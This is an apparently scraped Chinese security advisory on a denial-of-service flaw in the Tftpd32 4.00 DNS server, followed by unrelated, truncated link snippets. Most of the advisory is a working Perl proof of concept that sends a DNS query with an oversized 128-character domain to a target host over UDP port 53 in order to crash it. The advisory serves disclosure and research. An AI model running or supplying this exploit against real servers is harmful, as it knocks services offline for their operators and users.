tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞
发布日期:2012-05-28
更新日期:2012-05-29
受影响系统:
TFTPD32 TFTPD32 4.00
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53704
Tftpd32是Windows平台上的TFTP和DHCP服务器。
TFTPD32 4.00之前版本在实现上存在拒绝服务漏洞,DNS服务器绑定了UDP端口53,但没有验证域选项大小,在发送超过127个字符时,攻击者可利用此漏洞造成服务器崩溃。
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
demonalex ()提供了如下测试方法:
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
use Socket;
use Math::BigInt;
$|=1;
$host=shift;
$port=shift || '53';
die "usage: $0 \$host [\$port]\n" if(!defined($host));
$target_ip = inet_aton($host);
$target = sockaddr_in($port, $target_ip);
$crash='A'x128;
$transaction_id_count=1;
sub dns_struct_pack($){
$domain=shift; #domain
$type="\x00\xff"; #dns_type = ANY
$transaction_id_count=1 if($transaction_id_count > 255);
$x=Math::BigInt->new($transaction_id_count);
$x=~s/0x//;
$transaction_id=sprintf("\x00".chr($x));
$flag="\x01\x00";
$question="\x00\x01";
$answer_rrs="\x00\x00";
$authority_rrs="\x00\x00";
$additional_rrs="\x00\x00";
if($domain ne '0'){
undef($domain_length);
$domain_length=length($domain);
$y=Math::BigInt->new($domain_length);
$y=~s/0x//;
$domain_length=chr($y);
}
$class="\x00\x01"; #IN
$transaction_id_count++;
if($domain eq '0'){
$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."\x00"."$type"."$class";
}else{
$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain".
"\x00"."$type"."$class";
}
return $packet_struct;
}
print "Launch attack ... ";
socket(SOCK1, AF_INET, SOCK_DGRAM, 17);
send(SOCK1, &dns_struct_pack($crash), 0, $target);
close(SOCK1);
print "Finish!\n";
exit(0);
-----------------------------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
TFTPD32
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
tftpd32Linux,Tftpd32 DNS服务器拒绝服务漏洞相关推荐
- 云计算之路-试用Azure:搭建自己的内网DNS服务器
之前我们写过一篇博文谈到Azure内置的内网DNS服务器不能跨Cloud Service,而我们的虚拟机部署场景恰恰需要跨多个Cloud Service,所以目前只能选择用Azure虚拟机搭建自己的内 ...
- 这个TsuNAME 新漏洞可对关键 DNS 服务器发动 DDoS 攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士 新西兰和荷兰国家域名注册商(.nz 和 .nl)的运营商在 DNS 流量权威服务器中检测到异常情况后,在域名服务器 (DNS) 生态系统中 ...
- dns服务器漏洞修复,KB4569509:DNS 服务器漏洞 CVE-2020-1350 指南
简介 2020 年 7 月 14 日,Microsoft 发布了针对 CVE-2020-1350 | Windows DNS 服务器远程代码执行漏洞中描述的问题的安全更新. 此通报描述了影响配置为运行 ...
- 网络电话显示服务器拒绝,云安全日报201223:思科IP电话发现拒绝服务漏洞,需要尽快升级...
12月22日,思科发布了安全更新,主要修复了IP电话TCP数据包发现的拒绝服务漏洞.以下是漏洞详情: 漏洞详情 来源:https://tools.cisco.com/security/center/c ...
- 网络电话显示服务器拒绝,云安全日报201223:思科IP电话发现拒绝服务漏洞 需要尽快升级...
12月22日,发布了安全更新,主要修复了IP电话TCP数据包发现的拒绝服务漏洞.以下是漏洞详情: 漏洞详情 来源:https://tools.cisco.com/security/center/con ...
- Linux之DNS服务器搭建及常见DNS***和防御
DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串.通过主机名,最终 ...
- 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...
- 运维之DNS服务器Bind9配置解析和基础示例及附带命令
0x03 Bind 配置解析 实例1.DNS主从区域传输介绍与配置 实例2.DNS区域传输限制 实例3.DNS部分二级域名解析 示例1.采用Bind建立一个A记录DNS服务器 示例2.采用Bind建立 ...
- DNS 区域传送漏洞(dns-zone-tranfer)学习
DNS 区域传送漏洞(dns-zone-tranfer)学习 ---- 相关知识理解 DNS(域名系统)就像一个互联网电话簿.它负责将人类可读的主机名解析为机器可读的 IP 地址. DNS服务器分为主 ...
- dns协议类漏洞学习--结合snort分析(二)
cve-2014-8500 漏洞描述: ISC BIND 9.0.x到9.8.x,9.9.0到9.9.6和9.10.0到9.10.1不限制delegation chaining,允许远程攻击者通过大量 ...
最新文章
- 鸿蒙0s是什么意思,华为官宣,鸿蒙0S正式来临?
- Spring4新特性——核心容器的其他改进
- winowsformshost 的构造函数执行符合指定的绑定约束的_C# 应该允许为 struct 定义无参构造函数...
- @Url cannot be used with @GET URL (parameter #1)
- jvm 助记符_您的JVM是否泄漏文件描述符-像我的一样?
- SQL Server 2008 高可用性视频(四)-- 故障转移群集
- 注解 @ModelAttribute 运用详细介绍
- 视觉SLAM十四讲学习笔记-第四讲---第五讲学习笔记总结---李群和李代数、相机
- Java数组基础笔记(引用、字符串数组)
- CLR via C# 3 读书笔记(5):第1章 CLR执行模型 — 1.5 本地代码生成器工具:NGen.exe...
- 《Java8实战》-第五章读书笔记(使用流Stream-02)
- Python进阶-----类的内置item属性方法
- php 盒子边距,CSS 盒子模型外边距
- 【POJ 1113】Wall【凸包+一点思维】
- 软件测试面试题:简述什么是静态测试、动态测试、黑盒测试、白盒测试、α测试 β测试?
- html给标签添加背景,HTML – 如何在div上添加背景(灯箱效果)?
- linux 查看java版本
- IOS APP程序发布IPA以及发布上传到AppStore
- 免费易混实词辨析456组(1)
- P1462 通往奥格瑞玛的道路(二分 迪杰斯特拉 最短路 + spfa最短路算法)